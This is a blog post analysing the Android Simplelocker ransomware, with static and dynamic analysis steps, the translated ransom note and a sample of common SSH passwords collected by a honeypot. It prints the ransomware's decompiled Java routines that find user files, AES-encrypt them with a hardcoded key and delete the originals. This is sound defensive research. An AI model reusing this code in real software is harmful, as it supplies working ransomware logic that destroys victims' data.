Secure Honey

SSH honeypot written in C

How To Dissect Android Simplelocker Ransomware

Monday 16th June 2014 11:56

In this blog post we'll be looking at a new type of malware for Android phones that encrypts important files and demands the user pay a ransom to regain access to their phone.

This is the first reported case of ransomware being used on smartphones so I'm keen to find out more about this new malicious app.

I want to understand what this ransomware does and how it restricts the phone user from accessing files on their SD card. I'll be providing a step-by-step dissection of the malware to provide a clear explanation of how this app carries out its malicious activities.

So before we start the dissection let's look at exactly what Simplelocker is and where it came from.

What is Simplelocker?

First reported by Eset (ESET Analyzes First Android File-Encrypting, TOR-enabled Ransomware) on the 4th June 2014, Simplelocker has one goal: to encrypt certain files on the phone's SD card and then demand cash to decrypt the data - also known as ransomware.

Ransomware is a type of malware that "restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed" (see Wikipedia: Ransomware).

We've seen plenty of cases recently of ransomware infecting computer's (such as CryptoLocker and Cryptowall) but this appears to be the first case of smartphone ransomware in action.

Credit to the following articles for their explanation of the Simplelocker ransomware:

Simple Locker Ransomware Dissection

MD5: fd694cf5ca1dd4967ad6e8c67241114c
SHA256: 8a918c3aa53ccd89aaa102a235def5dcffa047e75097c1ded2dd2363bae7cf97
APK obtained from: contagiominidump.blogspot.in/2014/06/simplocker-android-file-encrypting-tor.html

This post will follow a similar form to the previous post How To Dissect Android Flappy Bird Malware, only I'll assume you've already installed the various tools required for dissection.

The tools I'll be using for this dissection are the same as the previous dissection:

For this dissection I'll still be using dynamic and static analysis, but the approach will be slightly different.

Due to the dangerous nature of ransomware it could be risky to carry out the dynamic analysis first, just in case the ransomware does something malicious to the computer. So I'll be carrying out a basic static analysis in order to determine what the app does and if it's safe to run in a virtual environment, before carrying out the dynamic analysis. I'll then return to the static analysis where we'll look at the code in greater detail and how it carries out the malicious activities.

Basic Static Analysis

The first task is to turn the APK file into a .jar file which we can then open in JD-GUI to see the Java code that's powering the ransomware.

Heading over to the console, we first want to use the tool dex2jar to convert the APK file into a .jar file. The following command should do the trick:

sh /home/user/dex2jar-version/d2j-dex2jar.sh /home/user/simplocker.apk

This should produce a .jar file which you can open in JD-GUI, producing something similar to the screenshot below:

Let's take a brief look at what this app is doing by exploring some of the class files:

In a nutshell this information tells us the following:

  1. This app is looking for images, documents and videos to encrypt. After encrypting the files it will then rename their file extensions to .enc
  2. The app has a C&C (command and control) server on the TOR network
  3. The app collects information about the phone (IMEI, OS, phone model, manufacturer) to send to C&C server
  4. Presumably the C&C server can send decryption instructions to the app

We now have a good overall picture of how this app carries out its ransomware activities. We can also determine that's it's reasonably safe to open this app in the virtual Android environment on DroidBox, so let's move onto the next phase.

Dynamic Analysis

In this phase we want to allow the app to run in a safe environment to confirm whether or not our suspicions from the basic static analysis phase are true.

The main tool we'll use for this phase is DroidDox (refer to the previous post, How To Dissect Android Flappy Bird Malware, for installation instructions)

We'll be working on the command line for this part. Also, remember to export the Android SDK path so we can work from any directory and still have access to the SDK tools:

export PATH=$PATH:/path/to/android-sdk/tools/
export PATH=$PATH:/path/to/android-sdk/platform-tools/

Make sure you have a virtual device setup and ready to deploy in the Android Virtual Device (AVD) manager by entering the command:

android

Heading over to the DroidBox directory, we can now start the Android emulator by entering the following command:

./startemu.sh <AVD name>

Which should open up the virtual Android device with the OS loading, as seen in the screenshot below:

The Android emulator might take a minute or two to fire-up. Once it's ready, enter the following into the command line. This will install Simplelocker onto the virtual device and run the app:

./droidbox.sh simplelocker.apk

Once the app has installed, the virtual Android screen should look like the screenshot below:

This screenshot is the Simplelocker lock screen presented to the user. The text translates from Russian as follows:

WARNING your phone is locked!

The device is locked for viewing and distribution child pornography , zoophilia and other perversions.

To unlock you need to pay 260 UAH.

1. Locate the nearest payment kiosk.

2. Select MoneXy

3. Enter 380982049193.

4. Make deposit of 260 Hryvnia, and then press pay.

Do not forget to take a receipt!

After payment your device will be unlocked within 24 hours.

In case of no PAYMENT YOU WILL LOSE ALL DATA ON your device!

Interestingly, the code to enter (in step 3) appears to be the same every time the app is executed.

Heading back to the command line, DroidBox should have produced an output similar to the screenshot below:

Go ahead and press Ctrl-C to to view the JSON log of data collected while the app was running.

This log shows the use of localhost 127.0.0.1 port 9051 being used for sending and receiving data, the app also accesses a lot of files.

This output didn't prove much because there's no SD card attached to the virtual Android device and therefore no files to encrypt. So let's carry out the experiment again, but this time with some files to be encrypted.

Head back to the AVD manager by entering the command Android on the command line. Open up the settings for the AVD being used for the experiment and enable the SD card with a size of 30 MiB.

The location of this SD card image should be ~/.android/avd//sdcard.img, so the virtual SD card can be mounted by using the following command

mount ~/.android/avd/sdcard.img -o loop /mnt/sdcard

At this point go ahead and copy onto the mounted virtual SD card some sample images ("jpeg", "jpg", "png", "bmp", "gif"), documents ("pdf", "doc", "docx", "txt") and videos ("avi", "mkv", "3gp", "mp4").

Once there are some sample files on the virtual SD card, unmount it by entering the following onto the command line:

umount /mnt/sdcard/

Now we're ready to fire up the AVD and run the app in DroidBox again:

./startemu.sh <AVD name>
./droidbox.sh simplelocker.apk

It might take the AVD a while to encrypt all the files, but after a few minutes stop the AVD and mount the virtual SD card again. All the sample files should have been encrypted and had their extensions renamed to .enc.

So at this point we can confirm that our basic static analysis turned out to be correct: this app encrypts images, documents and videos with pre-determined file extensions.

Static Analysis - Part Two

Having determined what this app does, let's find out how this app carries out its malicious activities by looking at its code in more detail.

The main function being carried out by this app is the file encryption which occurs in the classes FilesEncryptor and AesCrypt. The class FilesEncryptor contains a method called getFileNames():

private void getFileNames(File paramFile)
  {
    File[] arrayOfFile = paramFile.listFiles();
    int i = 0;
    if (i >= arrayOfFile.length)
      return;
    File localFile = new File(paramFile.getAbsolutePath(), arrayOfFile[i].getName());
    if ((localFile.isDirectory()) && (localFile.listFiles() != null))
      getFileNames(localFile);
    while (true)
    {
      i++;
      break;
      String str1 = localFile.getAbsolutePath();
      String str2 = str1.substring(1 + str1.lastIndexOf("."));
      if (this.extensionsToDecrypt.contains(str2))
      {
        this.filesToDecrypt.add(localFile.getAbsolutePath());
        continue;
      }
      if (!Constants.EXTENSIONS_TO_ENCRYPT.contains(str2))
        continue;
      this.filesToEncrypt.add(localFile.getAbsolutePath());
    }
  }

This code extract from the ransomware iterates through all files on the SD card. Line 15 calculates the file extension of each file on the SD card and then line 16 checks if the file extension is in the list of pre-determined file extensions to encrypt (found in the class Constants).

The same class also contains a method called encrypt():

  public void encrypt()
    throws Exception
  {
    AesCrypt localAesCrypt;
    Iterator localIterator;
    if ((!this.settings.getBoolean("FILES_WAS_ENCRYPTED", false)) && (isExternalStorageWritable()))
    {
      localAesCrypt = new AesCrypt("jndlasf074hr");
      localIterator = this.filesToEncrypt.iterator();
    }
    while (true)
    {
      if (!localIterator.hasNext())
      {
        Utils.putBooleanValue(this.settings, "FILES_WAS_ENCRYPTED", true);
        return;
      }
      String str = (String)localIterator.next();
      localAesCrypt.encrypt(str, str + ".enc");
      new File(str).delete();
    }
  }

This method iterates over all the files which were added to the array in the previous method (getFileNames()), as seen on line 9. Each file is encrypted on line 19 where a call is made to the encrypt() method of the AesCrypt class.

The encrypt() method from the AesCrypt class requires two parameters: name/location of file to be encrypted and name/location of the encrypted output file. Line 19 uses the name of the file (as determined by line 18) and then appends the extension .enc to the end of the file to write. Finally, line 20 deletes the original unencrypted file.

The class AesCrypt carries out the actual encryption and decryption of files. It's constructor method is shown below:

  public AesCrypt(String paramString)
    throws Exception
  {
    MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
    localMessageDigest.update(paramString.getBytes("UTF-8"));
    byte[] arrayOfByte = new byte[32];
    System.arraycopy(localMessageDigest.digest(), 0, arrayOfByte, 0, arrayOfByte.length);
    this.cipher = Cipher.getInstance("AES/CBC/PKCS7Padding");
    this.key = new SecretKeySpec(arrayOfByte, "AES");
    this.spec = getIV();
  }

This code snipped shows that the ransomware uses AES encryption using AES/CBC/PKCS7Padding.

The AesCrypt class contains a method called crypt() (as called earlier in FilesEncryptor's encrypt() method), this method is shown below:

  public void encrypt(String paramString1, String paramString2)
    throws Exception
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(1, this.key, this.spec);
    CipherOutputStream localCipherOutputStream = new CipherOutputStream(localFileOutputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
    {
      int i = localFileInputStream.read(arrayOfByte);
      if (i == -1)
      {
        localCipherOutputStream.flush();
        localCipherOutputStream.close();
        localFileInputStream.close();
        return;
      }
      localCipherOutputStream.write(arrayOfByte, 0, i);
    }
  }

This is where the file encryption takes places within the app. Lines 4 and 5 create variables used for the file input and output. Line 6 initialises the cipher (to encrypt data). Line 7 is where the encryption occurs and line 19 writes the encrypted byes to the output file.

Interestingly the same class also contains a method called decrypt() which is very similar to the encrypt() method:

  public void decrypt(String paramString1, String paramString2)
    throws Exception
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(2, this.key, this.spec);
    CipherInputStream localCipherInputStream = new CipherInputStream(localFileInputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
    {
      int i = localCipherInputStream.read(arrayOfByte);
      if (i == -1)
      {
        localFileOutputStream.flush();
        localFileOutputStream.close();
        localCipherInputStream.close();
        return;
      }
      localFileOutputStream.write(arrayOfByte, 0, i);
    }
  }

Obviously this method carries out the decryption on the input file and produces the decrypted output file. The same line numbers from the encrypt() method are highlighted to demonstrate how decryption occurs.

Conclusion

As previously noted by other write-ups about this ransomware: this is more of a proof-of-concept app at the moment and it has yet to be discovered on the Google Play Store. The app is also quite simple to reverse-engineer and no code obfuscation has been used.

This dissection shows how the app encrypts user's files and that information about the phone is sent to a C&C server on the TOR network.

But one important question remains unanswered: would it be possible to decrypt files that have been encrypted by the app without connecting to the C&C server? In other words: can we reverse the damage done by this app?

In the next blog post we'll look at how you can create an antidote for this ransomware.

Edit: as promised, a complete walkthrough on creating the antidote for Simplelocker (which will decrypt the files) is available in the blog post Creating An Antidote For Android Simplelocker Ransomware.

Image credit: "Google Android Amigurumi" by Kham Tran, flickr.com/photos/khamtran/5871541424/.

Comments

Rod

Tue, 17 Jun 2014 02:34:49 +0100

Awesome work!

Roshin

Tue, 17 Jun 2014 12:41:10 +0100

damn! awesome work dude! I've never read such a detailed explanation anywhere! keep up the good work! looking forward to more articles!

Alex

Fri, 20 Jun 2014 13:34:39 +0100

I wrote decoder at 9 June =) LOL for Russia

Add Comment

Name

Email (won't be displayed)

Website (optional)

Comments

Live Stats (see full stats)

Attempted logins

date range # attempts
today76
yesterday4,567
past 7 days22,882
past 30 days185,088
all time3,047,323

Top 5 passwords

password # attempts
-5,901
1234565,858
6666663,235
admin3,022
zxcvbnm2,516

Top 5 usernames

username # attempts
root2,986,829
admin18,429
bin1,903
oracle1,707
test1,453

Stats represent data collected from SSH login attempts on multiple honeypots. Parts of some stats may be filtered to maintain anonymity.

Updated: Wed, 22 Oct 2014 13:01:50 +0100

Live Password Cloud

admin123 1qaz redhat f**kyou server2000 888888 access idcidc qazwsx !@#$%^ 1q2w3e passwd 12344321 zxcvbnm qqpp qazxswedc 111111 159753 123456 zzzzzz P@ssw0rd manager - 000000 password123 p0o9i8u7 11223344 1234qwer zaqwsx caonima sa 147258369 0123456789 1234567890 admin 456789 qweasd qwertyu 123456qwerty idc2654321 abcd1234 987654321 iloveyou 23456 qaz 1q1q1q 123 sql woaini 1234 123123 a qwe adminadmin 1q2w3e4r 12qwaszx 123321 aaaaaa power pass admin1 0000 backup guest 445566 qazxsw 888999 a123456 onlyidc 123445 password zaqxswcde wang secret master 2008 qwer1234 336699 123qwe webserver 12345678 56789 147258 qwer qwerty qwert server changeme _ idc2008 sasa asdf 963852741 225588 zaqxsw qq 123789 qazwsx123 54321 zxcvbn qwertyui 258258 1qaz2wsx idc2007 test qazqaz 123456789 !QAZ2wsx hacker q1w2e3r4t5 q1w2e3 asdfg sapp test123 qwe123 1qazxsw2 idc123 12345 sa890pp q1w2e3r4 abcdefg abc123 shanghai zxcvb !QAZ@WSX administrator 111222 zaq1xsw2 asdfghjkl username oracle asdfgh 123abc zitian 1p203948576 1314520 windows 1qaz2wsx3edc qwertyuiop 789456 12p30495867 hellO china adminpp root user 654321 1QA2WS3ED chinaidc 123123123 1q2w3e4r5t 1234567 edong mnbvcxz scott zaq12wsx 5201314 Aa123456 qq123456 1111 zhang 666666 qazwsxedc welcome 121212 idccom topidc 987654 password1